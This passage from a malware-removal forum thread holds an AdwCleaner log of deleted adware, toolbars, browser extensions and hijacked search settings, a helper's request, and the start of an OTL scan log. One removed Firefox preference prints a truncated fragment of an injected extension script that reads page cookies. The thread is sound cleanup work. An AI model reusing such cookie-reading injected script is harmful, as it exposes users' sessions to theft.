Folder Deleted : C:\Users\COCHRAN\AppData\Local\AskToolbar
Folder Deleted : C:\Users\COCHRAN\AppData\Local\AVG Secure Search
Folder Deleted : C:\Users\COCHRAN\AppData\Local\Giant Savings
Folder Deleted : C:\Users\COCHRAN\AppData\Local\SearchProtect
Folder Deleted : C:\Users\COCHRAN\AppData\Local\Temp\BabylonToolbar
Folder Deleted : C:\Users\COCHRAN\AppData\LocalLow\AskToolbar
Folder Deleted : C:\Users\COCHRAN\AppData\LocalLow\AVG Secure Search
Folder Deleted : C:\Users\COCHRAN\AppData\LocalLow\Download and Sa
Folder Deleted : C:\Users\COCHRAN\AppData\Roaming\DriverCure
Folder Deleted : C:\Users\COCHRAN\AppData\Roaming\OpenCandy
Folder Deleted : C:\Users\COCHRAN\AppData\Roaming\ParetoLogic
Folder Deleted : C:\Users\COCHRAN\AppData\Roaming\SendSpace
Folder Deleted : C:\Users\COCHRAN\AppData\Roaming\Speedial
Folder Deleted : C:\Program Files (x86)\Mozilla Firefox\Extensions\[email protected]
Folder Deleted : C:\Users\COCHRAN\AppData\Roaming\Mozilla\Firefox\Profiles\5afpu397.default\Extensions\[email protected]
Folder Deleted : C:\Users\COCHRAN\AppData\Roaming\Mozilla\Firefox\Profiles\5afpu397.default\Extensions\[email protected]
Folder Deleted : C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ippkomaaonokjnfjoikaemidanojkfmm
Folder Deleted : C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndkhncnongaclekkbelchmeafffimifj
Folder Deleted : C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\Extensions\mhfjfmjcnocilkmbbbfncofpdjcfmiln
File Deleted : C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins\avg-secure-search.xml
File Deleted : C:\Users\COCHRAN\AppData\Roaming\Mozilla\Firefox\Profiles\5afpu397.default\searchplugins\trovi-search.xml
File Deleted : C:\Users\COCHRAN\AppData\Roaming\Mozilla\Firefox\Profiles\5afpu397.default\user.js
File Deleted : C:\Windows\System32\Tasks\Scheduled Update for Ask Toolbar
File Deleted : C:\Windows\Tasks\Speedial.job
File Deleted : C:\Windows\System32\Tasks\Speedial

***** [ Shortcuts ] *****


***** [ Registry ] *****

Value Deleted : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [[email protected]]
Value Deleted : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [[email protected]]
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\hhbgpoakplhahbklhkcfbpicgjcaoglk
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\ippkomaaonokjnfjoikaemidanojkfmm
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\ndkhncnongaclekkbelchmeafffimifj
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\mhfjfmjcnocilkmbbbfncofpdjcfmiln
Key Deleted : HKLM\SOFTWARE\Classes\AppID\IEHelperv2.5.0.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\ScriptHelper.EXE
Key Deleted : HKLM\SOFTWARE\Classes\AppID\ViProtocol.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AVG Secure Search.BrowserWndAPI
Key Deleted : HKLM\SOFTWARE\Classes\AVG Secure Search.BrowserWndAPI.1
Key Deleted : HKLM\SOFTWARE\Classes\AVG Secure Search.PugiObj
Key Deleted : HKLM\SOFTWARE\Classes\AVG Secure Search.PugiObj.1
Key Deleted : HKLM\SOFTWARE\Classes\GenericAskToolbar.ToolbarWnd
Key Deleted : HKLM\SOFTWARE\Classes\GenericAskToolbar.ToolbarWnd.1
Key Deleted : HKLM\SOFTWARE\Classes\HssIE.HssIEApp
Key Deleted : HKLM\SOFTWARE\Classes\HssIE.HssIEApp.1
Key Deleted : HKLM\SOFTWARE\Classes\IEHelperv250.WeCareReminder
Key Deleted : HKLM\SOFTWARE\Classes\IEHelperv250.WeCareReminder.1
Key Deleted : HKLM\SOFTWARE\Classes\PCProxy.DataContainer
Key Deleted : HKLM\SOFTWARE\Classes\Prod.cap
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Deleted : HKLM\SOFTWARE\Classes\protocols\handler\viprotocol
Key Deleted : HKLM\SOFTWARE\Classes\S
Key Deleted : HKLM\SOFTWARE\Classes\ScriptHelper.ScriptHelperApi
Key Deleted : HKLM\SOFTWARE\Classes\ScriptHelper.ScriptHelperApi.1
Key Deleted : HKLM\SOFTWARE\Classes\ViProtocol.ViProtocolOLE
Key Deleted : HKLM\SOFTWARE\Classes\ViProtocol.ViProtocolOLE.1
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\askpartnercobrandingtool_rasapi32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\askpartnercobrandingtool_rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\au__rasapi32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\au__rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\Giant Savings_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\Giant Savings_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\MyBabylontb_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\MyBabylontb_RASMANCS
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [Anti-phishing Domain Advisor]
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [vProt]
Key Deleted : HKLM\SOFTWARE\MozillaPlugins\@avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin
Key Deleted : HKLM\SOFTWARE\Classes\CrossriderApp0004479.BHO
Key Deleted : HKLM\SOFTWARE\Classes\CrossriderApp0004479.BHO.1
Key Deleted : HKLM\SOFTWARE\Classes\CrossriderApp0004479.FBApi
Key Deleted : HKLM\SOFTWARE\Classes\CrossriderApp0004479.FBApi.1
Key Deleted : HKLM\SOFTWARE\Classes\CrossriderApp0004479.Sandbox
Key Deleted : HKLM\SOFTWARE\Classes\CrossriderApp0004479.Sandbox.1
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{1FDFF5A2-7BB1-48E1-8081-7236812B12B2}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{4FBBF769-ECEB-420A-B536-133B1D505C36}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{9B0CB95C-933A-4B8C-B6D4-EDCD19A43874}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{9DC8FA51-B596-4F77-802C-5B295919C205}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{BB711CB0-C70B-482E-9852-EC05EBD71DBB}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3E28F712-0D6C-4EE3-AC8C-8F060F5D7C33}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{408CFAD9-8F13-4747-8EC7-770A339C7237}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{533403E2-6E21-4615-9E28-43F4E97E977B}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6CE321DA-DC11-45C6-A0FC-4E8A7D978ABC}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6EEBC7FF-67DA-4B90-9251-C2C5696E4B48}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{74137531-80F7-406F-9543-7D11385FA8C8}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{832599B2-55BF-4437-8F3E-030CF5AEB262}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{933B95E2-E7B7-4AD9-B952-7AC336682AE3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{94496571-6AC5-4836-82D5-D46260C44B17}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9B7B034B-944A-4261-B487-862F642F7615}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B1A429DB-FB06-4645-B7C0-0CC405EAD3CD}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B658800C-F66E-4EF3-AB85-6C0C227862A9}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{BC9FD17D-30F6-4464-9E53-596A90AFF023}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{CC5AD34C-6F10-4CB3-B74A-C2DD4D5060A3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D4027C7F-154A-4066-A1AD-4243D8127440}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D824F0DE-3D60-4F57-9EB1-66033ECD8ABB}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{DD67706E-819E-4EBD-BF8D-6D6147CC7A49}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F62A4AF9-58B4-4FEC-89CC-D717A547D8E8}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F773BB94-6C19-4643-A570-0E429103D1C3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F9E4A054-E9B1-4BC3-83A3-76A1AE736170}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{45CE3736-CA44-E3E0-4A7C-3AA5ABAE7037}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110011441179}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220022442279}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{33333333-3333-3333-3333-330033443379}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{6C434537-053E-486D-B62A-160059D9D456}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{91CF619A-4686-4CA4-9232-3B2E6B63AA92}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{AC71B60E-94C9-4EDE-BA46-E146747BB67E}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{F773BB94-6C19-4643-A570-0E429103D1C3}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550055445579}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660066446679}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{77777777-7777-7777-7777-770077447779}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{07CAC314-E962-4F78-89AB-DD002F2490EE}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{13ABD093-D46F-40DF-A608-47E162EC799D}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{2996F0E7-292B-4CAE-893F-47B8B1C05B56}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{74FB6AFD-DD77-4CEB-83BD-AB2B63E63C93}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{B12920CF-BE13-4C09-890D-1B6EFFFE2FBE}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{C2AC8A0E-E48E-484B-A71C-C7A937FAAB94}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E69D4A59-73DE-4E38-9FB3-740EC4D9060D}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440044444479}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D4027C7F-154A-4066-A1AD-4243D8127440}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D824F0DE-3D60-4F57-9EB1-66033ECD8ABB}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F9E4A054-E9B1-4BC3-83A3-76A1AE736170}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{45CE3736-CA44-E3E0-4A7C-3AA5ABAE7037}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110011441179}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{95B7759C-8C7F-4BF1-B163-73684A933233}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{D824F0DE-3D60-4F57-9EB1-66033ECD8ABB}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F9E4A054-E9B1-4BC3-83A3-76A1AE736170}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{45CE3736-CA44-E3E0-4A7C-3AA5ABAE7037}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{11111111-1111-1111-1111-110011441179}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{95B7759C-8C7F-4BF1-B163-73684A933233}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{D824F0DE-3D60-4F57-9EB1-66033ECD8ABB}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F9E4A054-E9B1-4BC3-83A3-76A1AE736170}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{45CE3736-CA44-E3E0-4A7C-3AA5ABAE7037}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{11111111-1111-1111-1111-110011441179}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{C6FDD0C3-266A-4DC3-B459-28C697C44CDC}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{11111111-1111-1111-1111-110011441179}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A5AA24EA-11B8-4113-95AE-9ED71DEAF12A}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AC5B6CDA-8F90-4740-9A8C-28AC5D3C73FE}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{11111111-1111-1111-1111-110011441179}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{3BD44F0E-0596-4008-AEE0-45D47E3A8F0E}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{95B7759C-8C7F-4BF1-B163-73684A933233}]
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{D4027C7F-154A-4066-A1AD-4243D8127440}]
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{D4027C7F-154A-4066-A1AD-4243D8127440}]
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{F9E4A054-E9B1-4BC3-83A3-76A1AE736170}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{6C434537-053E-486D-B62A-160059D9D456}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{91CF619A-4686-4CA4-9232-3B2E6B63AA92}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{AC71B60E-94C9-4EDE-BA46-E146747BB67E}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550055445579}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660066446679}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{77777777-7777-7777-7777-770077447779}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F9E4A054-E9B1-4BC3-83A3-76A1AE736170}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKCU\Software\AVG Secure Search
Key Deleted : HKCU\Software\Conduit
Key Deleted : HKCU\Software\hotspotshield
Key Deleted : HKCU\Software\IGearSettings
Key Deleted : HKCU\Software\InstallCore
Key Deleted : HKCU\Software\installedbrowserextensions
Key Deleted : HKCU\Software\Microsoft\Babylon
Key Deleted : HKCU\Software\ParetoLogic
Key Deleted : HKCU\Software\Speedial
Key Deleted : HKCU\Software\wecarereminder
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKCU\Software\AppDataLow\Software\AskToolbar
Key Deleted : HKCU\Software\AppDataLow\Software\Crossrider
Key Deleted : HKCU\Software\AppDataLow\Software\Giant Savings
Key Deleted : HKLM\Software\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\Software\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\Software\AVG Secure Search
Key Deleted : HKLM\Software\AVG Security Toolbar
Key Deleted : HKLM\Software\Conduit
Key Deleted : HKLM\Software\hotspotshield
Key Deleted : HKLM\Software\InfoAtoms
Key Deleted : HKLM\Software\InstallCore
Key Deleted : HKLM\Software\ParetoLogic
Key Deleted : HKLM\Software\SearchProtect
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{20E7BC40-33F6-4A81-9D52-B58349326206}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{86D4B82A-ABED-442A-BE86-96357B70F4FE}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Anti-phishing Domain Advisor
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG Secure Search
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Giant Savings
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\hotspotshield
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\InfoAtoms
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Speedial

***** [ Browsers ] *****

-\\ Internet Explorer v10.0.9200.16635

Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
Setting Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
Setting Restored : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]

-\\ Mozilla Firefox v29.0.1 (en-US)

[ File : C:\Users\COCHRAN\AppData\Roaming\Mozilla\Firefox\Profiles\5afpu397.default\prefs.js ]

Line Deleted : user_pref("avg.install.extHomepage", "hxxp://isearch.avg.com?pid=avg&sg=0&cid=%7Bea7d4595-3ffa-4598-881e-3ee33c81a286%7D&mid=2c434db7f12d47d0af1bc13194d1ac50-ad1491be2ce6c122f6b66faa90e70c2decf7d34c&d[...]
Line Deleted : user_pref("avg.install.installDirPath", "C:\\ProgramData\\AVG Secure Search\\FireFoxExt\\18.1.0.443");
Line Deleted : user_pref("avg.install.userSPSettings", "Trovi search");
Line Deleted : user_pref("avg.userPreferences.URLBarFocus.whiteList", "bing\\.com|google\\.\\w+|yahoo\\.\\w+|gmail\\.\\w+|hotmail\\.\\w+|live\\.\\w+|isearch\\.avg\\.com|mysearch\\.avg\\.com");
Line Deleted : user_pref("browser.newtab.url", "hxxp://www.trovi.com/?gd=&ctid=CT3321459&octid=EB_ORIGINAL_CTID&ISID=MB715B585-DAB0-4CC2-8A01-9B2669C2F371&SearchSource=69&CUI=&SSPV=&Lay=1&UM=5&UP=SPA33611B8-AFEE-4A0[...]
Line Deleted : user_pref("browser.search.defaultenginename", "Speedial");
Line Deleted : user_pref("browser.search.order.1", "blekko");
Line Deleted : user_pref("browser.search.selectedEngine", "Speedial");
Line Deleted : user_pref("browser.startup.homepage", "hxxp://isearch.avg.com?pid=avg&sg=0&cid=%7Bea7d4595-3ffa-4598-881e-3ee33c81a286%7D&mid=2c434db7f12d47d0af1bc13194d1ac50-ad1491be2ce6c122f6b66faa90e70c2decf7d34c&[...]
Line Deleted : user_pref("extensions.50ad158017616.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"su[...]

-\\ Google Chrome v35.0.1916.114

[ File : C:\Users\COCHRAN\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Search Provider] : hxxp://isearch.avg.com/search?cid={636196D1-FE70-4678-8956-109E454B61CE}&mid=2c434db7f12d47d0af1bc13194d1ac50-ad1491be2ce6c122f6b66faa90e70c2decf7d34c&lang=en&ds=AVG&pr=fr&d=2012-11-10 23:17:47&v=15.2.0.5&pid=avg&sg=0&sap=dsp&q={searchTerms}
Deleted [Search Provider] : hxxp://search.babylon.com/?q={searchTerms}&affID=109935&tt=280612_8_&babsrc=SP_ss&mntrId=927b96c40000000000000810761b2a53
Deleted [Search Provider] : hxxp://blekko.com/ws/?source=307c93ed&tbp=rbox&toolbarid=blekkotb_026&u=C816AF53B2D23E9A42F60C50AD12AD2B&q={searchTerms}
Deleted [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Deleted [Search Provider] : hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3321459&octid=EB_ORIGINAL_CTID&ISID=MB715B585-DAB0-4CC2-8A01-9B2669C2F371&SearchSource=58&CUI=&UM=5&UP=SPA33611B8-AFEE-4A09-BD22-CE9AB6019E94&q={searchTerms}&SSPV=
Deleted [Search Provider] : hxxp://speedial.com/results.php?f=4&q={searchTerms}&a=spd_ir_14_23_ff&cd=2XzuyEtN2Y1L1QzutCtDyBzz0DtBtAyDyEyD0AtAzyyC0CyEtN0D0Tzu0SzzzytDtN1L2XzutBtFtBtDtFtCzytFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2SyByE0CyDtCtByBtBtGtBtC0EzytGyBtAtDyBtG0B0AyB0FtGyByCzztD0AyBtCtD0C0EyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StB0EyCyEtA0A0A0BtGzyyBtB0BtGzyyD0AzytGtB0C0FyDtGtC0E0FzytB0AtAzyyC0C0EyB2Q&cr=1681320341&ir=
Deleted [Extension] : booedmolknjekdopkepjjeckmjkdpfgl
Deleted [Extension] : flpcjncodpafbgdpnkljologafpionhb
Deleted [Extension] : ippkomaaonokjnfjoikaemidanojkfmm
Deleted [Extension] : mhfjfmjcnocilkmbbbfncofpdjcfmiln
Deleted [Extension] : ndkhncnongaclekkbelchmeafffimifj

*************************

AdwCleaner[R0].txt - [25394 octets] - [12/06/2014 22:01:58]
AdwCleaner[S0].txt - [23095 octets] - [12/06/2014 22:04:18]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [23156 octets] ##########
 


  • 0

#8
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,793 posts
AllenCrown1,

Post a new OTL Log please.

Thanks
Joe
  • 0

#9
AllenCrown1

AllenCrown1

    New Member

  • Topic Starter
  • Member
  • Pip
  • 5 posts

here is otl

 

OTL logfile created on: 6/15/2014 6:03:43 PM - Run 2
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\COCHRAN\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.16428)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
7.98 Gb Total Physical Memory | 5.02 Gb Available Physical Memory | 62.93% Memory free
15.96 Gb Paging File | 5.27 Gb Available in Paging File | 33.05% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 931.41 Gb Total Space | 252.62 Gb Free Space | 27.12% Space Free | Partition Type: NTFS
Unable to calculate disk information.
Drive E: | 3.66 Gb Total Space | 0.00 Gb Free Space | 0.00% Space Free | Partition Type: CDFS
 
Computer Name: COCHRAN-PC | User Name: COCHRAN | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/06/07 14:53:27 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\COCHRAN\Desktop\OTL.exe
PRC - [2014/06/05 17:46:42 | 024,474,752 | ---- | M] (Google) -- C:\Program Files (x86)\Google\Drive\googledrivesync.exe
PRC - [2014/06/01 15:48:44 | 001,671,504 | ---- | M] (BitTorrent Inc.) -- C:\Users\COCHRAN\AppData\Roaming\uTorrent\uTorrent.exe
PRC - [2014/05/29 12:36:52 | 000,543,424 | ---- | M] (Valve Corporation) -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe
PRC - [2014/05/29 12:36:48 | 001,754,816 | ---- | M] (Valve Corporation) -- C:\Program Files (x86)\Steam\Steam.exe
PRC - [2014/05/14 05:27:57 | 001,863,856 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_214.exe
PRC - [2014/05/13 14:23:04 | 003,644,432 | ---- | M] (AVG Technologies CZ, s.r.o.) -- C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe
PRC - [2014/05/13 14:18:32 | 005,181,456 | ---- | M] (AVG Technologies CZ, s.r.o.) -- C:\Program Files (x86)\AVG\AVG2014\avgui.exe
PRC - [2014/05/13 14:15:28 | 000,292,424 | ---- | M] (AVG Technologies CZ, s.r.o.) -- C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe
PRC - [2014/05/11 22:26:57 | 000,275,568 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
